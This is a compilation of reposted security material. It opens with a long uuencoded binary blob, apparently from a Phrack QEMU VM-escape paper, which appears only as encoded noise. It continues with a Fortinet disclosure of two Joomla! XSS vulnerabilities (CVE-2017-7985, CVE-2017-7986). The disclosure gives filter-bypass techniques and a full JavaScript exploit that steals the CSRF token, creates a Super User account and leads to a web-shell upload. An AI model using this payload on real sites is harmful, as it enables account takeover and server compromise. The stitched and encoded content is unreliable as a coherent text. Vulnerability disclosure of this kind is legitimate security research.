MKU"!9Z;&BXO\`\C=ZT5&7G'R\FJUI/@RR$)4HN>B?(\6H%H\Z&_+AT9IR;ZE MS"%+1?'A.TPIGJIG@J)V9AS@FYO)L05[7+QS+6(XJ%!'0.R@OU:RS%8N79M' M"[XO^!RV-"!YEYLY++/Z?F.$(#8L`#Z6]=,`H*#3T*%]*\M=J>YAMW9=?@Y4 M.7L+L%HB5V2CINY`M'?`MID0Z8;LP!TIB!!5C?R^N%JB.Q@\D%(@@5-#:35? 
M-AUWH-3@`B?"+*Z%O-P!>=E!7NZ&7+FN&JQ`ECO60N]4476IM:4B+M>N2*8V M*E(F\7U"!DO,%0RB$J`0@RBP)IX.'NKN`E\=B8@/57HGXD.S%EFNMZ)&!0C< MV<`HM3;RMM2LENVMO5,9VQQ5#[/[[O6&)57%.P*1CGM>S]_A@GQ]=5]A))S@ M?_NN$T*RXJ*Z89.)_$Y*E4-\5XQ_CJ6Y=I,8*E)AZ=1'$MEF(D1[YUB_><:' MR`<R[,A)2_/"[^&[J-OHJ))6G)2#*E!*;?9X,E"J?AFPM10]V2#Q*Q[2ROS6 MH_W:(IHT1KL5%O9M.Y:6YFWUQ25OZ;5@>'6I#$<[K[8LQ8G1]3XT/>058-(= MSGMJ_"'5J8%*5[*G&ZH:Z=JNFITC_8*J"4%OM\5DK%ZX:PL)@UI5W5+15WJ< MT.A>I&.*PVFU0\I637F"NYDV)C@LW!?>R*3D4"6+VA,5A)R585>Z%!I>N'L: M/50/ZF6>G3U],3M[\N@QZ_Y>S/[[[)L73^2/)W]_\E7=YTIZ:_MKJ?UMR'%M M&ZRZKYKI`&),]8OPY9?#G:_+#M5%_97G!^7RK_>$H=6JM4[I+0/'UKWBIZ#> M;$'=55P>-)0+1T9'D6#5V#5PFR:<<KC@E[]M=4A#F]A5C!^HY6^QW92[SF9G M/A5>40;31=A$JB\.-=J="[R[Z'03)J'EB^F?KBZOKC<8\>0?UW/R^K!.F0_H M=D359I[LJ[8OL&$[&/:NB!<.Y[B?PR`315JRI<^]>_68=6Z;*%0U%;W8K):+ MB3(<G455"BT,XTD19)E_YP#64.VA>U[:JBS?-S/.GK^H<`!P^;[<?%AP%!72 M$GH=)2'K$(4*T;304:A&B\AT1?VEO#V1&*T!A*A\TJDD*;-3D0)X,>]O!:[1 M9.S-48"JAO1H1T7/G!Z$ZGFZJ^;>RG0JB';ZZV1'8\NUOEXN<3M9S-?HC62S MP?@WT+77^9UN`P?7K5LO0T;_.JYNX'[EQ6^@SOH]9P^1JF9U=JBRSEOM5NI> M5DR#QG.5GGZ'>>7N,*\(+\Y5?O*#F.4SG^&]IG([-D:8__T_=?SW]%U^;)N6 M=^Q9OO>KQH`?CO_N.('CR/CO?N!8&/_=]MPQ_OOO\1GCOX_QW\?X[V/\]S'^ M^QC_?8S_/L9__^3X[[\X4OJ?)P#W&%][C*\]QM<>XVN/\;7'^-K_CO&UQ_!H M8WBTWR(\VO_G0;7&B$IC1*4QHM(84>G?+*+2&"YF#!?S>X>+^5=%63&RZ\MJ M?XD2+">'R\;-#9IJ""L4JA-21-?(-D;QC]=X2WW2?:N,6:J?*GK/_[EA^<(9 M+2P=RTTQN?-J:=Y\;EK^S5^-._10^-Z<GMC(_,]-^P8RINI#:2Y%Q12\,KP# M_K2Q%JNNQ9`/#.IJ[QR.7@I'+X6CE\+12^'HI7#T4CAZ*1R]%(Y>"O_D7@I' M_W6C_[K1?YUF)S7ZKQO]UXW^ZWZI_[H_EV>>?H\VVYS9C"YH1A<THPN:DW\_ M%S2[J'V'%O\&@2H_EZ@C;M%=77?[!A/:LQA=XHPN<0AL=(DSNL097>*,+G&$ M2YQ;OZ2MWW^N\W?YNLR/TW7ZJ[[^W/;^TS)=WY?O/P,KL/']9^#8X_O/W^.S M[?6,>&13F[>??84NLV'/?W&X9^!7G-OX!Z9U>&C\*%UA4]J/>/=W>"ATEN<< M(/)UOLS7,9ID7I?(47B!_.B'%T\??_.]\<TWL$0O/BQ7E[!&[QO3O9L?'1L$ MR<V/ML]_'/[#B18D<BE+)%C\QZ0_(?T?T/\>_>\R-!?">\9]Q1:4#X:UHW3N MB.WYE3&H>%A#9HU!8`:.&9%)9IZ;N6_9J*FYB2(S\JPD9J/+P,]2UXH(P/3C MP@W)W#*/?"?V'#(#C7+?C;S888`\2\+0(5O-(,K2)(S)K#0W,R^/+#*NC(+, 
MSJ(P9(`H\=W4ILU6D"=6D"9D>YD'26AG9D``9E)86<1VH%:6!!8P&^W.XL2T MS8)J*YPD"BR73$9#-\E=*V.K3RO.XLP-"*N?95GNYE1;X69NXGED;QHZF1-Z M:<``CI]&(5N]^JZ?Q"&;HQ:9;Q=10$:D8>Q[:92G#.":EI>Z1!D?!(&?9D2Q M(C8+)_/)-#;,S-#,"H\`G,3/;3.EMKJI'UFF1Y3)/-]TK9SZ%MM^@.*$`5+3 MR=V,VNHF)K3<)<IDMIF%7D%]BSTS3CP_80`O\>*PH+:Z=F)'H4^CFR5)DD89 M]2U.D[2(7+;0=>P,BN0.F_="0].`1C=+,]_,4NI;G&26DWD1`=A^%CEF3%@] MH+5I.E1;&F:!9X5$L:3(3-^R?`:P$K<`BK/=<>*DKDVUI4421UY$%$O")(-^ M%`P0FG821FRN6YA>&+*A<.J;0."$1CVQS"2/;#94M@N_"-*0*..%?NBF%EL3 M6]"(+*913WS?MS,G(P`QN]G,5TPLFG!A9MMFDK)]<>99ILW\$%B)%7IAQ-;, MB9]X%E$F*I(B=V/J6QXF8>8ZS`]!:`9I%%-;S<(TBX@-KR/?C.(P9`MFR\RC MT&)^"`H_-F&4V"[:AY;:-+J1!5,QC:AON>\[7BKLHD4K"*N5^JEO^50;3&#/ M@=E!$]'V;=-TF1_\U/0C+R>L5F):L1=0;:%MA@60C`!@#%+78W[PO<3,HM1G MP_`DR",VG@Z3)$_"G"VLTP0X.F!^``)G5I8192POB^W,)8J%:>8$:4&C7B0P MAU.?^<'-$MNW/&JK$R-3IFR&[22I:0;4-V#6Q#%SY@<WSHK8<ZFM3I:%D9<1 M96+@D=3UV9(;6*]P"^8'U_$C$%HQF[7[>185*1MZ^T$8NFR8'OLF#)VP6'=- MU\X":JOCF`[,<!K=.#9C-_6H;UEF9D&:,C]XIND%ED-8[<"T72L6YN8F3%(V M-$\C,P4J,S]X@1\FGDU8;=,O0B^AVI+(]S/7)(JE()9S-V)^\/#%7V029>P( M1B2*B&(P.F84VC3J:9`%<9@(P_TH<9S,(LK8>>+";""*)4&2>:F3L*5]$OMI MS/P@A#>U-8J3(@%!11-1""P2TFYB97;$_)#'F0>;'6IKE&5V$,1$&5.,*`$X M&3!@R/R0.R`@$WY>$+F^ZR0A/SO(_,R/'>I;$/NQ%\?,#[EKYFEA4EM!WD1% M$;%M?FR:<6Y3WP)8)R)8.PA`,!EA#0,SC(&#:"+FI@5\0!3S(]-/;?$JH`A\ MVPL\PAJ:ON?#$D0`D9\ZL*,C@-Q/3#]G?BCRS+62@"@31IECPQ#S8X(L#J#E M!!!DF1NGS`]%E$09R"8"R),\ATX00``CD;L.*QH2,\PSY@=!#&IK;&56Y`1$ M&2?,PM1.J6]ND16%[3$_9%:2^$%!;8W])(6Y191QBL0S8=$C@#"Q'=]E?LA@ M,;)!UA)`8<8@FVET'=]TW+B@OKFPM86Q8'Z`]IMYD5);XQ"Z5W@TNH[EYV'. 
MCS!@(QPE><#\D":^E3@A84U2'R:`1;7!?J3([)@HYL%XY-`H!DC--`@BPIHD M9N(&)M4&DMBV_(0HYGDFP-C,#ZF7@(#@YQP)=,9,;**8G22N%T?\J"5-'!"H MS`\I,'11Q$29Q,M,$$5$,1N6DPC$-@$D61[G%O.#V)M06_/4=PK;)LH$GA_' M3D1],\5"R`"I"5,KIK;FB8FSG2@3V+"3"D)^-B,D!0-X2>'&(;4UA]4NB"T: MW2`!)DEBZILI2,D`=F:'>41MS;W,@[E'HQND69H7"?7-3+(D*VSF![&&$%;8 M1;FY[5)M?IAEB5,0Q:PBBT/'9WX(K22W8`M#`$!W&^0_`12)&00Y4<P*D\`- M`N8'7)>]."?*%(4)"UA`%/-]TP<!3J-NH0A,/.:'L/"]")B``$+?!EBB&"Q= M25%D-.H6[*+2PF5^$+Q.;<T"$P1-3I1Q<],-'7ZXY$0@I9R4^2$&:MN^3VV% M+8AIP<:``"(_<@.7^N;DP-!!QOP0YYGEQRZU-8/]D1=G-+H@,T'X^-0W)\A" M)RF8'^((>I9[XME3DL!>D$;7#1([+0+J&T@ZKRARY@<Q)H0UC9,XM4.JS8-6 M1[#"T$1T$S=V8E^\5LI,8$?"FF;0;3^BVCP7EJ+`)HK93A;Y0<+\`#/=#V*; MWSVYON7&"5',RWP84WX_9<=^82<1\P.L",`^#E$F=6`_FL=$,2\V80=HT:C# M'MS.BS!C8WGU<#$3/OQJ`UVI^6U;"P]'0T"KNRH<@[0?(3]_G/P2\;0=^I$[ MOTI?`(F5T7C5/*$0J*WNJRA.8W2HWR(ZE+3>T>`1=@ZMBU1U6IPTWUOBL`OJ M(K<4.?XCPJJCTB14/8EXFJE3E(S8R:I)VH&CDDH,G,%:@,]!0ET=-3U2GAJO MEG?(->1A$[&<7#0=40+$&:[K[1KBJZO%!PZ3Q4:/5(F"<T]TUL+.$AUZFU^] ML:#\4[56Q6R>^K5.N4+H17F=IGE9%M>+Q8?*]OU?K;7Y]3ZU_H^]G?P6=0SK M_TS8DY#^#_96I`'\7Z8%)PQGU/_]'A^IUZN4\LKE4JWO@D_LP1&X4@,V;Q-T MQ>W"4HISW.)&!<WB3AJKQ?%BN]F<9G$WRNOB>+>_I>UP`J^*4S3C5OE68VP% M.P7['<3N.D5=G,(;#V)W<Z6K&,!X&+N3*EYER/?X<&."M"Y>YHO6('6&*<_J MXA@G>0MV.%A7Q2E@\G!78P5[^:'<Y)=#C?&\0.EJ(\XR@[6PVPIENC=-3>QP MM';<0'&)I']FK>^)$X:%VC3M0^P>H@%LX/IZV$T'L@,;A:D>MO5*6@>;!78_ M;-@$;</"%EL/6SU`[6^S9UEZV+)1HQ86SJ&_?IM;#\ZUM#+SWX;.RE-U+6SF MUH)LZ!U[%S:`(Z<.5O-4MPOK*\[+!IZ_:]BT\'.K&("M'L=K89,X&H!MO@IO MPZ9..`#;>%/?J3=S0PWSE[I)V1HAQ]7,C%+'"6TVT+%NJ1,9;7FAS(F>5_H] M0BKQVA-"_XB_/1MB3Z'.+@_V.^151/'V!_B:Z1@6??`[L4(2I;]:_0.^`?J7 MAR+63*^N0X`>^,AT-")$[S&@RU5Y;A=./[A&ZK:G.+1^J/:VP&^!^[:6>"V? M!+W@H3<`KEDB6^!)I)EZ?9X--#,G[8`/.3WH3)S8^S.?!^OS'\7Z.<YOKA:K M^>9^^2N>!)%2@>?UV7_@[5#K_.>Y4'P\__T.G[]\]B"9+Q\D<7FQOX\6=?=N MZ,]QOK\_+XR7QO'_&'?N6G>,\_V]S46^1+.H]&(%::;QY56\N3C>K(YQ[WW, MKJT?WA$FUOO%?'^?TT[O6OO[Q?4R)3\?V;R,RY)4ACFE8+9`^ICR\LMD@3J? 
MNZ(`!D<W'A[8^WMHAWMZ=W+Y%@X25X?DI(1,<X\SX_A-5=ZX*]QL/S3N8K;` MSM]_5IHBRM..I=T@/'ODB\(X?FY4^#X:K]?YE7&_JNBC$;]_:WSQ$RF/C+ON MSU\T\7^X3$!V@C1:I82??A/ZJN5G;>QW7GUYEPN^>GBG78/5JB'[L(POY^E, MU%1UI*XHC0'L:K&IT/_%N#M1&V:(VJ``NN/^HGSPHSE]\."+0UWE=:&_WH4R MS=Z2%<VVII!E8*>K#_^ZM:OHWRTFQUTW\?IU:1Q_\]//PDV%<0==8=RU;NZ` M=/Z)GIQ`CV&B*(/8HC)3!#8T"^-X:5CMRNV?OS@4.'B^$@T/]['U=1I99*(/ M3YJ\0ZH4(+DRUPQ!!.Z28?F'=UHX=/H5J+8[VK6]YB`ZC?ZE!QV7W(*MJY[I MPX8E!Y'IE#=Z9%C2=P>1Z50[>F14<A"73N^CQT5N4(90Z71">E14<A"73F&D MQX4E!U'IE$EZ5%AR$)5.T:1'Q24'D>G44'ID6'(0E4Y%I4=%)8?[J-%?]?21 M2@[37J/=ZJ%]H^0@4IT.#"1/1RXW3:UU&#O-W:8MTU;3A1JFR3:UVO9*R+7K MSG7HU&_;Z]C<H@:=\FA[#374[6IJJ\=VJRF\744Z_=_VBA!J]SIT>L+M=91_ M2'KI=(^[5<10?]3)UM9K[E830PWO"+9I0;4U]4'M6I5>2[2MJB;4\*YIFY)5 M6Y<>ZI85M32R.U:$R;>KIZ4BW+&>"NJ6O6KI>W>L34+=;MG3ZHF'9WQY&XFD M52=OQ[^[5-6JG;=7L/MZJE5/;Z]@^ZY@6(\]Q*`=D)W&?"?M]PZ3K0/9K/U$ MW\UAI?50;_60MZKT]N)6"_D'[.A.*OWAV=J`U-?6RQP#]P#;*E4`=V/$@4N# MW>JJ`&]7GV;/MEM].PO)@0N)G7NVH[@<N+S8K:K=!>?`1<=N56TYC^QR)3+, M;AK`76H<O$49JK$'L$=Z_XDO7_X`G_K^Y[OX+0S?(O_UZ\!;G@'[/],,@M;] MCPLEQON?W^/SU=??/OK/YZ?'KXWCA=`T&<?E)CM-+<LX?CQ[_.3K1S]\BTYY M?CC[ZLG^?KQ8_-5X=WG,DV;DO3_[1Q/_&5C3_1WC/]N.[UEM_K?=8.3_W^,S MQG\>XS^/\9_'^,]C_.<Q_O,8_UGU=/.'"O;\Z9&<6\&*U0"TKAGYK6P1RY@^ M(J!Q5>+QV=]%.F[@ZN072G)-HV^?/GU6)=?FS(___MV+K[]ZSLFU-3=PZ+>R MM/+"Y/'95W][]@B3*92TFOR_OS+H>;&2#+S_'2/!"-@BSB?WJQ%8]^SQLSIX MY]DC\0,?/I\]?\$_7'ZNJ_-Z-#H]&IT>C4Z/1J='H],C`AB='HU.CT:G1Z/3 MH]'IT>CT:'1Z-#H]TC@]$J$.KM(E6WL5\]<RT+OE8ZSVRU66*ZYI#&.]R)>- MA$T[X3).7_KG)PJ6F=1&-\HMXFS],CQ7W>,8ZRI62)U6Q0_I-)CB.:C>=F0, MF*KY&!'E]>:"D[A:>@QS7<J0],U$NU'SY;S9%*4?W!8ZILD><9LX%,'+SI&^ M.K-Y+,=XE>1UQN9=#*7[+$=YO1\LQ)MGR%4;@T]D*"@'AB,>8SV/L9ZUL9X? M3%GYH@LIIT[C&;E:FJ7KM'9&)6,-=7R/#0;M&OV2_19^R4`:+C$.E!P3X9+L M2'HEJ_F(!;P2M$4G^:?\=W`DNP)XNDL<&@V8D.LT%41\,U%_-ZB:VDP.`\/? MCQ_B`@4#0#K-CZ1GY.A-2):J#&HU[KR"L]XKV(F^@IWI*SCKO;K)\U>PP:&( M`+(H+F^D9S25Q(TNL8XGI`^Q)GJGHAF&V-00W5#KJ8R_*(.,U934CFA?2$2. 
MD3<O9^LZDC8ME4FZ1&%ZW%FXT)$;YAV<TG:PD+\_TF_3-+?'5*R;1!&91&$E MB%VGTCJ,X5`HMW;(0U[LT>DB-%!(<NZJC!RZSM,<I)WPPU<:J_>HK$\^\&TI ML`>'$65T<D]`0Q^:,F1:5TI2M*/=R-_'([M&A.M2:GL\..XZ+I;/7SPSGGS_ MS'CT^#%J^I/YIM1VF,;6=@B4Y_[D6,:6P]_*7*#?RES8:X\%;0^Y"<5B?D4D M7Y<7\&VSZB?Y1TEST?CYZV6\D'&>"(#BD%9S1T;D>_1,!L"#S)NPG?WXV7#D MNX8X5'^HJY&:CN$]3EK@-/C\5;*\>C<T4'RM+RXFARPB1WE:U5'[AU0CY&WS M3KJIRI`$6*R.C(OY;QW538EW)EB[-V2:5BJTJ"!%`ZURT\-6K--/0;W9@KHK M>`\:@W=D=`;*JK%KX#9-."5:FGE85UA/MX8T["[L!VKYH]WC58E/JS.?"J\L M9A2<<R*GV:&&>RYP9]7I)FR?+%]$51/>0IL>3%$,\-Y-E<8G^VJD9O2U.WPP MPPU3VP4OQF.NQZRS%R:?I53T8K-:8FS0REVI#`.'EC!DA,72:@ZE&I((52[$ M/LOWS8RSYR\J'`!<OJ^CV)%0\SHRC46>D'BFA7H!C=!C,J*XE9L]B=$:0(@R M02=!*;-3D0)X,>]OQ7PYWY!]%-KW;>J&]`AST3.G!Z$:#["[*F_E,15$.]MU MHN(3HCF-G_$S?L;/^!D_XV?\C)_Q,W[&S_@9/^-G_(R?\3-^QD_]^7_T`TH, $`$`!```` ` end Sursa: http://phrack.org/papers/vm-escape-qemu-case-study.html
Multiple Joomla! Core XSS Vulnerabilities Are Discovered
by Zhouyuan Yang | May 04, 2017 | Filed in: Security Research

Joomla! is one of the world's most popular content management system (CMS) solutions. It enables users to build custom Web sites and powerful online applications. More than 3 percent of Web sites run Joomla!, and it accounts for more than 9 percent of the CMS market share. As of November 2016, Joomla! had been downloaded over 78 million times. Over 7,800 free and commercial extensions are currently available from the official Joomla! Extension Directory, and more are available from other sources.

This year, as a FortiGuard researcher, I discovered and reported two Cross-Site Scripting (XSS) vulnerabilities in Joomla!. They are identified as CVE-2017-7985 and CVE-2017-7986, and Joomla! patched them [1] [2] this week. These vulnerabilities affect Joomla! versions 1.5.0 through 3.6.5. They exist because these versions of Joomla! fail to sanitize malicious user input when users post or edit an article. A remote attacker could exploit them to run malicious code in a victim's browser, potentially allowing the attacker to gain control of the victim's Joomla! account. If the victim has higher permissions, such as a system administrator, the remote attacker could gain full control of the web server. In this blog, I will share the details of these vulnerabilities.

Background

Joomla! has its own XSS filters. For example, a user with post permission is not allowed to use full HTML elements. When such a user posts an article with HTML attributes, Joomla! sterilizes dangerous code like "javascript:alert()", "background:url()", and so on. Joomla! achieves this sterilization in two ways: on the client side it uses an editor called "TinyMCE," and on the server side it sanitizes the request before storing it on the server.

Analysis

To demonstrate these vulnerabilities, the test account 'yzy1' is created.
It has author permission, which does not allow the use of full HTML elements.

To bypass the client-side sterilization, the attacker can use a network intercept tool like Burp Suite, or simply change the default editor to one of the other Joomla! built-in editors, like CodeMirror or None, as shown in Figure 1.

Figure 1. Bypassing the client side XSS filter

On the server side, I found two ways to bypass the XSS filters. They are identified as CVE-2017-7985 and CVE-2017-7986.

CVE-2017-7985

The Joomla! server-side XSS filter sterilizes dangerous code and keeps the safe characters. For example, when we post crafted code with the test account, Joomla! sterilizes it by double-quoting some parts, deleting others, and adding safe links to the URLs, as shown in Figure 2.

Figure 2. Joomla! XSS filter

But an attacker could take advantage of the filter by tricking it into reconstructing the code and rebuilding the scripts. For example, we can add crafted code in which the double quote is the CORRECT DOUBLE QUOTATION MARK, as shown in Figure 3.

Figure 3. Inserting the PoC for CVE-2017-7985

When victims access the post, regardless of whether it's published or not, the inserted XSS code is triggered in both the main page and the administrator page, as shown in Figures 4 and 5.

Figure 4. CVE-2017-7985 PoC triggered in the home page
Figure 5. CVE-2017-7985 PoC triggered in the administrator page

CVE-2017-7986

When posting an article, the attacker could bypass the XSS filter in an HTML tag by replacing the ":" in the script with its HTML-encoded form, since that sequence is rendered as the ":" mark in HTML. The attacker could then trigger the script code by adding a clickable tag. For example, the attacker can insert such code in an article, as shown in Figure 6.

Figure 6. Insert the PoC for CVE-2017-7986

When victims access the post, regardless of whether it's published or not, and click the "Click Me" button, the inserted XSS code is triggered in both the main page and the administrator page, as shown in Figures 7 and 8.
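The "reconstruction" failure mode behind CVE-2017-7985 can be illustrated with a deliberately naive filter. The function below is not Joomla!'s actual code; it is a minimal sketch of the general class of bug, where deleting a forbidden substring splices the remaining characters together into the very tag the filter tried to remove:

```javascript
// Deliberately naive single-pass filter - NOT Joomla!'s implementation.
// It deletes every literal "<script>" / "</script>" substring it finds.
function naiveStrip(html) {
  return html.replace(/<\/?script>/g, "");
}

// Deleting the inner tags splices the surrounding characters together,
// so one pass of "sterilization" *rebuilds* a working script tag:
var payload = "<scr<script>ipt>alert(1)</scr</script>ipt>";
console.log(naiveStrip(payload)); // "<script>alert(1)</script>"
```

Any filter that transforms input by deleting or rewriting substrings, rather than rejecting it or encoding the output, can be coaxed into assembling a payload this way.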
Figure 7. CVE-2017-7986 PoC triggered in home page
Figure 8. CVE-2017-7986 PoC triggered in administrator page

Exploit

Here I provide an exploit example for CVE-2017-7986 that allows an attacker with a low-permission account to create a Super User account and upload a web shell. To achieve this, I will write a small piece of JavaScript code that creates a Super User account using the site administrator's permission. It first obtains the CSRF token from the user edit page, and then posts the Super User account creation request to the server with the stolen CSRF token. The new Super User will be 'Fortinet Yzy' with the password 'test'.

var request = new XMLHttpRequest();
var req = new XMLHttpRequest();
var id = '';
var boundary = Math.random().toString().substr(2);
var space = "-----------------------------";

// Step 1: fetch the user edit page to scrape the CSRF token.
request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true);
request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
        var resp = request.responseText;
        // The CSRF token is the *name* of a hidden input whose value is "1".
        var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/;
        id = myRegex.exec(resp)[1];

        // Step 2: post the Super User creation request with the stolen token.
        req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true);
        req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary);
        var multipart = space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[name]\"" + "\r\n\r\nFortinet Yzy\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[username]\"" + "\r\n\r\nfortinetyzy\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[password]\"" + "\r\n\r\ntest\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[password2]\"" + "\r\n\r\ntest\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[email]\"" + "\r\n\r\nzyg@gmail.com\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" + "\r\n\r\n0\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" + "\r\n\r\n0\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[block]\"" + "\r\n\r\n0\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" + "\r\n\r\n0\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[id]\"" + "\r\n\r\n0\r\n" + space + boundary +
            // Group 8 is the Super Users group in a default Joomla! install.
            "\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" + "\r\n\r\n8\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" + "\r\n\r\n\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"task\"" + "\r\n\r\nuser.apply\r\n" + space + boundary +
            "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + "\r\n\r\n1\r\n" + space + boundary + "--\r\n";
        req.onload = function() {
            if (req.status >= 200 && req.status < 400) {
                var resp = req.responseText;
                console.log(resp);
            }
        };
        req.send(multipart);
    }
};
request.send();

An attacker can add this code to Joomla! by exploiting this XSS vulnerability, as shown in Figure 9.

Figure 9.
Adding XSS code

Once the site administrator triggers this XSS attack in the administrator page, a Super User account is immediately created, as shown in Figures 10 and 11.

Figure 10. Site administrator triggers the XSS attack in the administrator page
Figure 11. A new Super User account is created by the attacker

The attacker can then log in to Joomla! using this new Super User permission and upload a web shell by installing a plugin, as shown in Figures 12 and 13.

Figure 12. Uploading a web shell using the attacker's Super User account
Figure 13. Attacker accesses the web shell and executes commands

Solution

All users of Joomla! should upgrade to the latest version immediately. Additionally, organizations that have deployed Fortinet IPS solutions are already protected from these vulnerabilities with the signatures Joomla!.Core.Article.Post.Colon.Char.XSS and Joomla!.Core.Article.Post.Quote.Char.XSS.

Sursa: https://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered
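One detail of the exploit above worth isolating: Joomla! renders its CSRF token as the *name* of a hidden input whose value is "1", which is why the script scrapes it with a regex before posting. The snippet below checks that scrape in isolation; the page fragment and token value are hypothetical stand-ins for a real Joomla! user edit page:

```javascript
// Same regex as the exploit above; the sample markup and token value
// are made up for illustration - a real token is issued per session.
var page = '<form><input type="hidden" name="1f3870be274f6c49b3e31a0c6728957f" value="1" /></form>';
var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/;
var token = myRegex.exec(page)[1];
console.log(token); // "1f3870be274f6c49b3e31a0c6728957f"
```

Because the token is embedded in every authenticated page, any XSS running in the administrator's session can read it, which is what makes the CSRF protection ineffective against this attack.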